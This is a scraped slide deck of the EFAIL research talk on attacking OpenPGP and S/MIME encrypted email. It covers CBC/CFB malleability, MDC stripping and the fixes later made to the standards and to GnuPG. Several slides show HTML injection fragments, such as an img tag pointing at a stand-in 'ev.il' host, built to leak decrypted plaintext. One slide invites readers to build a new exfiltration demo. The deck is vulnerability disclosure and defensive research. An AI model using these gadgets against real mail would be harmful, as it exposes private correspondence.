attacking end to end encrypted emails
play

Attacking End-to-End Encrypted Emails Joint research with : Prof. - PowerPoint PPT Presentation

Mar 10, 2023 •273 likes •1.01k views

https://efail.de/ Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian Poddebniak, Christian Dresen, Twitter: @seecurity Jens Mller, Fabian Ising, Simon Friedberger, Juraj Somorovsky, Jrg

  1. https://efail.de/ Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian Poddebniak, Christian Dresen, Twitter: @seecurity Jens Müller, Fabian Ising, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk, Marcus Brinkmann.

  2. Email. 2

  3. av2.com av1.com smtp.corp2 smtp.corp1 imap.corp2 imap.corp1 archive.corp1 archive.corp2

  4. av1.com smtp.corp1 imap.corp1 archive.corp1

  5. There is no such thing as “My Email”. 5

  6. av1.com Assumption: smtp.corp1 imap.corp1 Attacker has archive.corp1 access to emails!

  7. Two competing standards OpenPGP (RFC 4880) • First “encryption for the masses” • Favored by privacy advocates • Most widely used email clients require plugin S/MIME (RFC 5751) • Favored by corporate organizations • Native support in most widely used email clients 7

  8. New published PGP public keys per month ? Known limitations!  Usability  Snowden Effekt Thanks to Marcus Brinkmann @neopg_  Enigmail  New keys at keyserver  Hard for S/MIME  Opsec von Snowden und thegruq  Ver- und Entschlüsselung nur in separater Anwendung! 8

  9. Daily users of Enigmail Known limitations!  Usability  Snowden Effekt  Enigmail  New keys at keyserver  Hard for S/MIME  Opsec von Snowden und thegruq  Ver- und Entschlüsselung nur in separater Anwendung! 9

  10. ‘99 ‘06 ‘15 10

  11. PGP and OpSec  Some tutorials recommend using PGP outside of email client. • https://gist.github.com/grugq/ 03167bed45e774551155 • https://vimeo.com/56881481  Others recommended Enigmail in default settings (i.e. HTML switched on) 11

  12. Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker 12

  13. 2014: Enigmail won’t encrypt. https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/ 13

  14. 2017: Outlook includes plaintext in encrypted email. https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/ 14

  15. 2018: Enigmail/PEP won‘t encrypt. https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html 15

  16. Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker Plaintext bugs 16

  17. Hybrid decryption • Choose message 𝑛 Content-type: app/encrypted • Generate session key 𝑡 𝒍 𝑡 • Encrypt message 𝑛 with session key 𝑡 Dear Alice, – 𝑑 = 𝐵𝐹𝑇 𝑡 (𝑛) • Encrypt session key 𝑡 with public key c thank you for your email. 𝑞𝑣𝑐 of recipient The meeting tomorrow – 𝑙 = 𝑆𝑇𝐵 𝑞𝑣𝑐 (𝑡) will be at 9 o‘clock . • Send the encrypted session key and the encrypted message to the recipient 17

  18. Hybrid decryption • Obtain the encrypted email Content-type: app/encrypted • Extract ciphertext 𝑙 and ciphertext 𝑑 𝒍 𝑡 • Decrypt 𝑙 with private key 𝑡𝑓𝑑 to Dear Alice, obtain session key 𝑡 – 𝑡 = 𝑆𝑇𝐵 𝑡𝑓𝑑 (𝑙) c thank you for your email. • Decrypt ciphertext 𝑑 with session key The meeting tomorrow 𝑡 to obtain the cleartext 𝑛 will be at 9 o‘clock . – 𝑛 = 𝐵𝐹𝑇 𝑡 𝑑 18

  19. Ciphertext malleability 𝑡 Dear Alice, ↯ ????????????????ur efail. The meeting tomorrow will 𝒅 be at 9 o‘clock . 19

  20. CBC Mode of Encryption C 2 C 1 C 0 decryption decryption Content-type: te xt/html\nDear Bob P 0 P 1 20

  21. Malleability of CBC/CFB C 2 C 1 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 0 ' P 1 21

  22. Malleability of CBC/CFB C 2 C 1 C 0 ⊕ P 0 decryption decryption 0000000000000000 xt/html\nDear Bob P 0 ' P 1 CBC Gadget 22

  23. Malleability of CBC/CFB C 2 C 1 C 0 ⊕ P 0 ⊕ P c decryption decryption <img src =” ev.il/ xt/html\nDear Bob P c P 1 23

  24. Malleability of CBC/CFB C 2 C 1 ' C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 0 ' P 1 ' 24

  25. Malleability of CBC/CFB C 2 C 1 ' C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 0 ' P 1 ' 25

  26. Ciphertext Malleability 𝑡 Dear Alice, ↯ ????????????????ur efail. The meeting tomorrow will 𝒅 be at 9 o‘clock . 26

  27. MAC != digital signature “valid signature” Message Authentication Codes • Protection against ciphertext tampering “invalid signature” Digital Signatures? • Merely used to display status message or icon • In many cases, attacker can – remove signatures “encrypted, not signed” – sign unknown ciphertext under own identity 27

  28. S/MIME 28

  29. S/MIME 29

  30. Attacking S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted <base " " href="http:"> ???????????????? ???????????????? <img " ???????????????? ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi "> ???????????????? Modify Duplicate Reorder 30

  32. Backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt 40/47 clients have User interaction Airmail MailMate Apple Mail macOS No user interaction backchannels requiring Mail App Outlook CanaryMail iOS Leak via bypass no user interaction K-9 Mail MailDroid J avascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru Mailbox ProtonMail Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 32

  33. • S/MIME has no standard- conforming countermeasure • Email clients try to mitigate this (insufficiently) 33

  34. Demo ohne html

  35. Outlook: Non-HTML CBC Gadgets? recommendations PDF 28.12.2018 35

  36. Outlook: Non-HTML CBC Gadgets? recommendations PDF 28.12.2018 36

  37. Outlook: Non-HTML CBC Gadgets? recommendations MS Word 28.12.2018 37

  38. Outlook: Non-HTML CBC Gadgets? recommendations LibreOffice 28.12.2018 38

  39. Outlook: Non-HTML CBC Gadgets? Challenge: 1. Write a non-HTML demo that exfiltrates OpenPGP or S/MIME email plaintext blocks via attachments (PDF, Word, XML, ...). 2. First successful submission gets a crate of Club Mate and Efail swag! 39

  40. Efail-related changes to S/MIME Efail CBC Gadget attack: Efail direct exfiltration attack: EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, 28.12.2018 40 https://tools.ietf.org/html/draft-ietf-lamps-rfc5751-bis-12#page-45 Schwenk

  41. OPENPGP 41

  42. Differences S/MIME  OpenPGP • OpenPGP uses a variation of CFB-Mode • Plaintext compression is enabled by default • OpenPGP defines Modification Detection Code “MDC“ ( 𝑇𝐼𝐵1(𝑛) ) MDC SEIP m sha1(m) 42

  43. OpenPGP RFC on invalid MDCs 43

  44. # new PGP keys with/without MDCs per year Thanks to Marcus Brinkmann @neopg_ 28.12.2018 44

  45. # cumulative valid PGP keys not supporting MDCs per year Thanks to Marcus Brinkmann @neopg_ 28.12.2018 45

  46. Attacking OpenPGP 1. MDC stripped: SEIP m sha1(m) 2. MDC incorrect: SEIP m‘ sha1(m) 3. SEIP->SE downgrade SEIP m sha1(m) 46

  47. Attacking OpenPGP Client Plugin (up to MDC Stripped MDC Incorrect SEIP -> SE version) Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 47

  48. Efail-related changes to OpenPGP https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#section-5.8 48

  49. Efail-related changes to OpenPGP https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#page-104 49

  50. Efail-related changes to OpenPGP Checking MDC only possible after full decryption – GnuPG streams plaintext to app during decryption – Only when finished, GnuPG prints flag whether or not decryption was successful. OpenPGP draft already supported chunking of plaintext – Pro: Authenticate chunks before giving it to app! – Con: Recommended chunk size is 128MByte (OpenPGP implementations may not want to cache 128MByte and thus use streaming again) https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#page-63 https://mailarchive.ietf.org/arch/msg/openpgp/KXM9nqbhkn3ELTznP6YBQhEipC0 50

  51. Efail-related changes to GnuPG • MDC errors now result in hard failures (not merely warnings). • GnuPG now always uses MDC independently if key denotes MDC support or not. • But: – Sets default chunks sizes from 1GByte to 128MByte. – Still streams unauthenticated plaintext. 51

  52. av1.com smtp.corp1 imap.corp1 archive.corp1

  53. Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker Plaintext bugs 53

  54. Efail Direct Exfiltration Alice’s mail program encrypts the email Alice writes a Mail to Bob Encryption From: Alice To: Bob -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock . -----END PGP MESSAGE----- 54

Recommend

15 Years of Broken Encrypted Emails and were still doing it wrong Alfredo Pironti

15 Years of Broken Encrypted Emails and were still doing it wrong Alfredo Pironti

15 Years of Broken Encrypted Emails and were still doing it wrong Alfredo Pironti IOActive alfredo.pironti@ioactive.com IMDEA - NEXTLEAP 3 Mar 2017 1 Agenda Intro to OpenPGP An efficient attack on signatures And

459 views • 25 slides
Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
Towards a Fully Encrypted Internet CS244 | Zakir Durumeric 2013 Snowden Revelations Explicit

Towards a Fully Encrypted Internet CS244 | Zakir Durumeric 2013 Snowden Revelations Explicit

Towards a Fully Encrypted Internet CS244 | Zakir Durumeric 2013 Snowden Revelations Explicit evidence that intelligence agencies are globally wiretapping Internet backbone connections Massive collection of web tra ffi c, emails, instant

512 views • 50 slides
TLS 1.3 Encrypted SNI ekr: ekr@rtfm.com dkg: dkg@aclu.org IETF 94 TLS 1.3 Encrypted SNI 1

TLS 1.3 Encrypted SNI ekr: ekr@rtfm.com dkg: dkg@aclu.org IETF 94 TLS 1.3 Encrypted SNI 1

TLS 1.3 Encrypted SNI ekr: ekr@rtfm.com dkg: dkg@aclu.org IETF 94 TLS 1.3 Encrypted SNI 1 DISCLAIMER: THIS IS NOT FULLY-BAKED We just fleshed out this idea yesterday, so its hand-wavy. Insufficient analysis has been done. IETF 94 TLS 1.3

886 views • 11 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff on our website Copy of presentation posted on our website by Friday afternoon students receive registration cards &amp; elective course

392 views • 25 slides
Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff on our website Copy of presentation posted on our website students received registration cards &amp; elective course descriptions

622 views • 22 slides
Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff on our website Copy of presentation posted on our website by Friday afternoon students receive registration cards registration cards

451 views • 32 slides
Challenges With Building End-to-End Encrypted Challenges With Building End-to-End Encrypted

Challenges With Building End-to-End Encrypted Challenges With Building End-to-End Encrypted

Challenges With Building End-to-End Encrypted Challenges With Building End-to-End Encrypted Applications Learnings From Etesync Applications Learnings From Etesync stosb.com/talks Tom Hacohen tom@stosb.com FOSDEM 2019 @TomHacohen

361 views • 32 slides
FUNDAMENTAL RULES OF AWESOME EMAILS THAT SELL Remove all visual branding The from

FUNDAMENTAL RULES OF AWESOME EMAILS THAT SELL Remove all visual branding The from

FUNDAMENTAL RULES OF AWESOME EMAILS THAT SELL Remove all visual branding The from field should be YOUR name You need a compelling subject line The content must be digestible You cant send too many emails You need to

323 views • 16 slides
Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov

Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov

Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov Claudio Orlandi Aarhus University RWC 2018 Agenda I A Threat Model for Encrypted Cloud Storage (ECS). I A high-level look into a modern ECS service

770 views • 47 slides
Garrett Robinson and Yan Zhu Real World Crypto 2015 Goal i dunno how to PGP [encrypted]

Garrett Robinson and Yan Zhu Real World Crypto 2015 Goal i dunno how to PGP [encrypted]

Garrett Robinson and Yan Zhu Real World Crypto 2015 Goal i dunno how to PGP [encrypted] [encrypted] Who uses it? https://freedom.press/securedrop/directory Threat Model Assets Sources identity Confidentiality &amp; integrity

782 views • 35 slides
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 1 1 Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have

733 views • 48 slides
Supporting Less-Than Queries on Encrypted Data using Multi-Server Secret Sharing and Practical

Supporting Less-Than Queries on Encrypted Data using Multi-Server Secret Sharing and Practical

Supporting Less-Than Queries on Encrypted Data using Multi-Server Secret Sharing and Practical Order-Revealing Encryption Nate Chenette ICERM conference on Encrypted Search June 12, 2019 Project Background Baffle Inc. https://baffle.io/

407 views • 23 slides
HOW TO WRITE A PROFESSIONAL Tips and Tricks to making your EMAIL emails work appropriate!

HOW TO WRITE A PROFESSIONAL Tips and Tricks to making your EMAIL emails work appropriate!

HOW TO WRITE A PROFESSIONAL Tips and Tricks to making your EMAIL emails work appropriate! PERSONAL V. PROFESSIONAL EMAILS Personal Professional Informal Formal Between friends and family Between business professionals Peer

469 views • 11 slides
y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

Security bug of the week (in iOS and OS X) y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 2 2 Attacking the stack g We have seen how the

850 views • 47 slides
Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State University of New York) Joint with Seth Chaiken and Christopher R.H. Hanusa Outline 1. Chess Problems: Non-Attacking Pieces 2. Largely Czech

608 views • 17 slides
Encrypted DNS Privacy? A Traffic Analysis Perspective Sandra Siby, Marc Juarez, Claudia

Encrypted DNS Privacy? A Traffic Analysis Perspective Sandra Siby, Marc Juarez, Claudia

Encrypted DNS Privacy? A Traffic Analysis Perspective Sandra Siby, Marc Juarez, Claudia Diaz, Narseo Vallina-Rodriguez, Carmela Troncoso NDSS, 25 February 2020 Encrypted DNS &gt; Privacy? Can encrypting DNS protect users from tra ffi

533 views • 40 slides
Traceback for End-to-End Encrypted Messaging Nirvan Tyagi Ian Miers Tom Ristenpart CCS 2019 1

Traceback for End-to-End Encrypted Messaging Nirvan Tyagi Ian Miers Tom Ristenpart CCS 2019 1

Traceback for End-to-End Encrypted Messaging Nirvan Tyagi Ian Miers Tom Ristenpart CCS 2019 1 Setting: End-to-end encrypted (E2EE) messaging Hello Alice Bob Platform 2 Setting: End-to-end encrypted (E2EE) messaging Hello &gt; 2

1.03k views • 73 slides
Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology for some of these slides Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have already seen how code

671 views • 47 slides
Naive Bayes case study Training set: 10,000 emails that are either SPAM or HAM Testing set:

Naive Bayes case study Training set: 10,000 emails that are either SPAM or HAM Testing set:

Naive Bayes case study Training set: 10,000 emails that are either SPAM or HAM Testing set: 1,000 additional emails Train a Naive Bayes classifier on (a subset of) the training set Predict SPAM/HAM on the test set and compute

775 views • 13 slides
- able to differentiate the informative emails from the alerting emails. We refer to informative

- able to differentiate the informative emails from the alerting emails. We refer to informative

Association Rule Mining for Suspicious Email Detection: A Data Mining Approach S.Appavu alias Balamurugan, Aravind, Athiappan, Bharathiraja, Muthu Pandian and Dr.R.Rajaram Abstract-Email has been an efficient and popular Work done by

377 views • 8 slides
100% Encrypted Web New Challenges for TLS Kirk Hall Dir Policy &amp; Compliance, Certificate

100% Encrypted Web New Challenges for TLS Kirk Hall Dir Policy &amp; Compliance, Certificate

#RSAC P D AC-W10 SESSION ID: SESSION ID: 100% Encrypted Web New Challenges for TLS Kirk Hall Dir Policy &amp; Compliance, Certificate Services Entrust Datacard #RSAC We are moving toward a 100% encrypted web but can we get it right?

857 views • 58 slides
Searches Through Encrypted Data presenter: Reza Curtmola Advanced Topics in Network Security

Searches Through Encrypted Data presenter: Reza Curtmola Advanced Topics in Network Security

Searches Through Encrypted Data presenter: Reza Curtmola Advanced Topics in Network Security (600/650.624) Introduction Searching usually done over plaintext But what if we could search encrypted data? Bloom Filters Efficient

459 views • 30 slides

More recommend